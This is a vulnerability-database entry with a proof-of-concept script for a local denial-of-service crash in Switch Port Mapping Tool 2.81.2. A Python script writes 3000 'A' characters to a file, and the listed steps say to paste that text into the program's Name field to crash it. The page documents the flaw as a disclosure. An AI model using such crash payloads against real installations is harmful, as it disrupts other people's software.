Switch Port Mapping Tool 2.81.2 Denial Of Service

2018.08.14

Credit: Shubham Singh

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)
# Discovery by: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovey Date: 2018-08-13
# Vendor Homepage: https://switchportmapper.com/
# Software Link: https://switchportmapper.com/download/spm2812.zip
# Tested Version: 2.81.2
# Tested on OS: Windows 7 Ultimate x86_64
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name
# "exploit.txt". Just copy the text inside "exploit.txt" and start the
# Managed Switch Port Mapping Tool 2.81.2 program and click on "Enter Key".
# In the 'Name field' paste the content of "exploit.txt" and click
# on "OK". You will see a crash.
#!/usr/bin/env python
file = open("exploit.txt","wb")
junk = "A" * 3000
exploit = junk
buf = exploit
file.write(buf)
file.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Switch Port Mapping Tool 2.81.2 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.